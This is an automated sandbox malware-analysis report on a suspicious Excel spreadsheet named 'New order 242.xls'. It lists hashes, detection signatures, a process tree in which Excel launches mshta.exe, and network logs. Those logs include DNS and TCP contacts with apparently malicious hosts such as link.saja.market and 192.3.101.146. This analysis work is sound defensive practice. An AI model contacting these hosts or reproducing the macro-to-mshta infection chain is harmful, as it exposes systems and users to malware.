Joe Sandbox Cloud Basic Analysis Report
Edit tour

Windows Analysis Report
New order 242.xls

Overview

General Information

Sample name:New order 242.xls
Analysis ID:1640395
MD5:1880402f48cccdbfbd8512b6e03ba144
SHA1:7d52fb9c27b199ef4c0ade6dfda7a5bed33d8d49
SHA256:8ffc44346b0715a33f30802fccf6b5d99edcc8323e06b0459fc2366a2c7e249f
Tags:xlsuser-abuse_ch
Infos:

Detection

Score:60
Range:0 - 100
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Sigma detected: Suspicious Microsoft Office Child Process
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

Process Tree

  • System is w10x64
  • EXCEL.EXE (PID: 6800 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 4A871771235598812032C822E6F68F19)
    • mshta.exe (PID: 1220 cmdline: C:\Windows\SysWOW64\mshta.exe -Embedding MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • splwow64.exe (PID: 1936 cmdline: C:\Windows\splwow64.exe 12288 MD5: 77DE7761B037061C7C112FD3C5B91E73)
  • EXCEL.EXE (PID: 368 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\New order 242.xls" MD5: 4A871771235598812032C822E6F68F19)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\SysWOW64\mshta.exe -Embedding, CommandLine: C:\Windows\SysWOW64\mshta.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\SysWOW64\mshta.exe, NewProcessName: C:\Windows\SysWOW64\mshta.exe, OriginalFileName: C:\Windows\SysWOW64\mshta.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, ParentProcessId: 6800, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\SysWOW64\mshta.exe -Embedding, ProcessId: 1220, ProcessName: mshta.exe
Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 3.39.153.44, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 6800, Protocol: tcp, SourceIp: 192.168.2.12, SourceIsIpv6: false, SourcePort: 49762
Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.12, DestinationIsIpv6: false, DestinationPort: 49762, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 6800, Protocol: tcp, SourceIp: 3.39.153.44, SourceIsIpv6: false, SourcePort: 443

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-03-17T09:29:37.545969+010020283713Unknown Traffic192.168.2.124976413.107.246.60443TCP
2025-03-17T09:29:42.777526+010020283713Unknown Traffic192.168.2.124976513.107.246.60443TCP
2025-03-17T09:29:42.778108+010020283713Unknown Traffic192.168.2.124976613.107.246.60443TCP

Joe Sandbox Signatures

  • AV Detection
  • Compliance
  • Software Vulnerabilities
  • Networking
  • System Summary
  • Hooking and other Techniques for Hiding and Protection
  • Malware Analysis System Evasion

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: New order 242.xlsVirustotal: Detection: 33%Perma Link
Source: New order 242.xlsReversingLabs: Detection: 22%
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
Source: unknownHTTPS traffic detected: 3.39.153.44:443 -> 192.168.2.12:49762 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.12:49764 version: TLS 1.2

Software Vulnerabilities

barindex
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\mshta.exe
Source: global trafficDNS query: name: otelrules.svc.static.microsoft
Source: global trafficDNS query: name: link.saja.market
Source: global trafficDNS query: name: otelrules.svc.static.microsoft
Source: global trafficTCP traffic: 192.168.2.12:49762 -> 3.39.153.44:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49766 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49765 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49763 -> 192.3.101.146:80
Source: global trafficTCP traffic: 192.168.2.12:49762 -> 3.39.153.44:443
Source: global trafficTCP traffic: 192.168.2.12:49762 -> 3.39.153.44:443
Source: global trafficTCP traffic: 192.168.2.12:49762 -> 3.39.153.44:443
Source: global trafficTCP traffic: 192.168.2.12:49762 -> 3.39.153.44:443
Source: global trafficTCP traffic: 192.168.2.12:49762 -> 3.39.153.44:443
Source: global trafficTCP traffic: 192.168.2.12:49762 -> 3.39.153.44:443
Source: global trafficTCP traffic: 192.168.2.12:49762 -> 3.39.153.44:443
Source: global trafficTCP traffic: 192.168.2.12:49762 -> 3.39.153.44:443
Source: global trafficTCP traffic: 192.168.2.12:49762 -> 3.39.153.44:443
Source: global trafficTCP traffic: 192.168.2.12:49762 -> 3.39.153.44:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49765 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49765 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49765 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49766 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49766 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49766 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49765 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49766 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49766 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49765 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49765 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49765 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49765 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49766 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49766 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49766 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49766 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49762 -> 3.39.153.44:443
Source: global trafficTCP traffic: 3.39.153.44:443 -> 192.168.2.12:49762
Source: global trafficTCP traffic: 192.168.2.12:49762 -> 3.39.153.44:443
Source: global trafficTCP traffic: 192.168.2.12:49762 -> 3.39.153.44:443
Source: global trafficTCP traffic: 3.39.153.44:443 -> 192.168.2.12:49762
Source: global trafficTCP traffic: 3.39.153.44:443 -> 192.168.2.12:49762
Source: global trafficTCP traffic: 192.168.2.12:49762 -> 3.39.153.44:443
Source: global trafficTCP traffic: 192.168.2.12:49762 -> 3.39.153.44:443
Source: global trafficTCP traffic: 3.39.153.44:443 -> 192.168.2.12:49762
Source: global trafficTCP traffic: 3.39.153.44:443 -> 192.168.2.12:49762
Source: global trafficTCP traffic: 192.168.2.12:49762 -> 3.39.153.44:443
Source: global trafficTCP traffic: 192.168.2.12:49762 -> 3.39.153.44:443
Source: global trafficTCP traffic: 3.39.153.44:443 -> 192.168.2.12:49762
Source: global trafficTCP traffic: 3.39.153.44:443 -> 192.168.2.12:49762
Source: global trafficTCP traffic: 192.168.2.12:49762 -> 3.39.153.44:443
Source: global trafficTCP traffic: 3.39.153.44:443 -> 192.168.2.12:49762
Source: global trafficTCP traffic: 192.168.2.12:49762 -> 3.39.153.44:443
Source: global trafficTCP traffic: 192.168.2.12:49762 -> 3.39.153.44:443
Source: global trafficTCP traffic: 3.39.153.44:443 -> 192.168.2.12:49762
Source: global trafficTCP traffic: 192.168.2.12:49763 -> 192.3.101.146:80
Source: global trafficTCP traffic: 192.3.101.146:80 -> 192.168.2.12:49763
Source: global trafficTCP traffic: 192.168.2.12:49763 -> 192.3.101.146:80
Source: global trafficTCP traffic: 192.168.2.12:49763 -> 192.3.101.146:80
Source: global trafficTCP traffic: 192.3.101.146:80 -> 192.168.2.12:49763
Source: global trafficTCP traffic: 192.3.101.146:80 -> 192.168.2.12:49763
Source: global trafficTCP traffic: 192.3.101.146:80 -> 192.168.2.12:49763
Source: global trafficTCP traffic: 192.3.101.146:80 -> 192.168.2.12:49763
Source: global trafficTCP traffic: 192.168.2.12:49763 -> 192.3.101.146:80
Source: global trafficTCP traffic: 192.168.2.12:49763 -> 192.3.101.146:80
Source: global trafficTCP traffic: 192.3.101.146:80 -> 192.168.2.12:49763
Source: global trafficTCP traffic: 192.3.101.146:80 -> 192.168.2.12:49763
Source: global trafficTCP traffic: 192.3.101.146:80 -> 192.168.2.12:49763
Source: global trafficTCP traffic: 192.168.2.12:49763 -> 192.3.101.146:80
Source: global trafficTCP traffic: 192.3.101.146:80 -> 192.168.2.12:49763
Source: global trafficTCP traffic: 192.3.101.146:80 -> 192.168.2.12:49763
Source: global trafficTCP traffic: 192.168.2.12:49763 -> 192.3.101.146:80
Source: global trafficTCP traffic: 192.3.101.146:80 -> 192.168.2.12:49763
Source: global trafficTCP traffic: 192.3.101.146:80 -> 192.168.2.12:49763
Source: global trafficTCP traffic: 192.168.2.12:49763 -> 192.3.101.146:80
Source: global trafficTCP traffic: 192.168.2.12:49763 -> 192.3.101.146:80
Source: global trafficTCP traffic: 192.3.101.146:80 -> 192.168.2.12:49763
Source: global trafficTCP traffic: 192.3.101.146:80 -> 192.168.2.12:49763
Source: global trafficTCP traffic: 192.168.2.12:49763 -> 192.3.101.146:80
Source: global trafficTCP traffic: 192.168.2.12:49763 -> 192.3.101.146:80
Source: global trafficTCP traffic: 192.3.101.146:80 -> 192.168.2.12:49763
Source: global trafficTCP traffic: 192.3.101.146:80 -> 192.168.2.12:49763
Source: global trafficTCP traffic: 192.168.2.12:49763 -> 192.3.101.146:80
Source: global trafficTCP traffic: 192.168.2.12:49763 -> 192.3.101.146:80
Source: global trafficTCP traffic: 192.3.101.146:80 -> 192.168.2.12:49763
Source: global trafficTCP traffic: 192.168.2.12:49763 -> 192.3.101.146:80
Source: global trafficTCP traffic: 192.168.2.12:49763 -> 192.3.101.146:80
Source: global trafficTCP traffic: 192.168.2.12:49763 -> 192.3.101.146:80
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
Source: global trafficTCP traffic: 192.168.2.12:49764 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.12:49764
